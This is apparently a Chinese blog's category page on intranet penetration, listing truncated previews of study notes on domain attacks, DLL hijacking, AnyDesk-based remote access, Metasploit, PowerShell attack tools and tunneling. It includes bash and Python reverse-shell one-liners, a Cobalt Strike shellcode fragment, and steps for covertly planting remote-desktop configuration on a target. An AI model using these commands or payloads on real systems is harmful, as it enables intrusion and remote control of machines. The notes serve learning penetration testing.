内网安全
关注
分享
扫一扫
文章平均质量分 70
内网安全
. iDea.
这个作者很懒,什么都没留下…
展开
-
域渗透学习笔记
初识域什么是域域(domain)是windows网络中独立运行的单位,将网络中多台计算机逻辑上组织在一起,进行集中管理,这种区别于工作组的逻辑环境叫做域。域控在一个机器上装上活动目录以后,这个机器就会被称为域控。在windows的域中,不使用主域控制器与备份域控制器。每个域控制器充当的都是一样的角色,比如你有三个域控制器,你可以在任何时候一个域控制器上对用户的权限进行修改,你的修改将被复制到其他两个域控制器中,同样,如果一个域控制器发生故障,只要其他的域控制器还能正常工作,整个域还是可以正常运行转载 2022-05-04 23:36:46 · 909 阅读 · 0 评论 -
dll劫持
aheadlib工具劫持可以看见生成了一个cpp文件,然后我们创建一个dll文件将生成的cpp文件替换到如下文件添加#include “pch.h”填加如下代码/* cs的payload length: 892 bytes */unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b原创 2022-05-04 16:18:01 · 6497 阅读 · 0 评论 -
未开启3389实现远程桌面
在内网渗透时如果目标没有开启3389,或者通过某种手段给禁用掉了。此时我们就可以通过今天介绍的工具进行远程连接。项目地址https://download.anydesk.com/AnyDesk.exe打开应用设置连接的用户名和密码退出本地的AnyDesk,然后到c:\Users\{USER}\AppData\Roaming\AnyDesk 目录下将ad.trace、service.conf、system.conf、user.conf这个4个文件上传到目标的c:\Users\{目标在原创 2021-07-25 22:23:22 · 716 阅读 · 0 评论 -
查找域管理员进程
前言在渗透测试中,一个典型的域权限提升过程,通常围绕着收集明文凭据或通过mimikatz提权等方法,在获取了管理员权限的系统中寻找域管理员登录进程,进而收集域管理员的凭据。如果内网环境非常复杂,渗透测试人员无法立即在拥有权限的系统中获得域管理员进程,那么通常采用的方法是:在跳板机之间跳转,直至获得域管理员权限,同时进行一些分析工作,进而找到渗透测试的路径。现在我们来假设一种情况:渗透测试人员在某个内网环境中获得一个域普通用户的权限,首先通过各种方法获得当前服务器的本地管理员权限,然后分析当前服务器的用户原创 2021-05-03 23:56:51 · 782 阅读 · 0 评论 -
msf使用基础
前言msf是后渗透神奇,在kali中已经内置有。1.1 基础使用metasploit程序需要使用postgresql数据库手动启动数据库:service postgresql start设置成开机启动数据库:systemctl enable postgresql启动msfmsfconsole1.2.查找模块search 模块名//比如我要找永恒之蓝 search ms17_010使用那个模块 use 模块名或use 前面的数字都可以1.3使用模块#查看要设置的参原创 2021-05-03 22:42:27 · 727 阅读 · 0 评论 -
powershell渗透基础
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。常用的powershell攻击工具有以下几种:powerSploit:常用于信息探测,权限提升,凭证窃取,持久化等操作Nishang:基于powershell的渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本Empire:基于powe原创 2021-04-30 17:19:52 · 1366 阅读 · 3 评论 -
Linux下反弹shell命令
Linux下反弹shell命令接收端口和发送端端口要一致bash反弹shell接收端: nc -lvp 端口发送端: bash -i >& /dev/tcp/接收端IP/接收端端口 0>&1python反弹shell接收端: nc -lvp 端口发送端: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con原创 2021-02-06 17:48:05 · 286 阅读 · 0 评论 -
内网02
常用隧道网络层:IPv6隧道ICMP隧道GRE隧道传输层:TCP隧道UDP隧道常规端口转发应用层:SSH隧道HTTP隧道HTTPS隧道DNS隧道判断内网的连通性ping www.baidu.comnc -zv 192.168.1.10 80curl www.baidu.com:80//curl的代理模式curl -x proxy-ip:port www.baidu.com//windows下的nslookupmslookup www.baidu.com原创 2021-01-21 14:52:16 · 183 阅读 · 0 评论 -
内网信息收集
1.查询网络配置命令:ipconfig /all2.查询操作系统及软件的信息1)查看操作系统和版本信息systeminfo | findstr /B /C:"OS Name" /C:"OS Version"//适用于英文的操作系统,中文的:systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"2)查看系统体系结构echo %PROCESSOR_ARCHITECTURE%查看安装的软件及版本、路径等wmic product get name,原创 2021-01-21 14:45:46 · 610 阅读 · 0 评论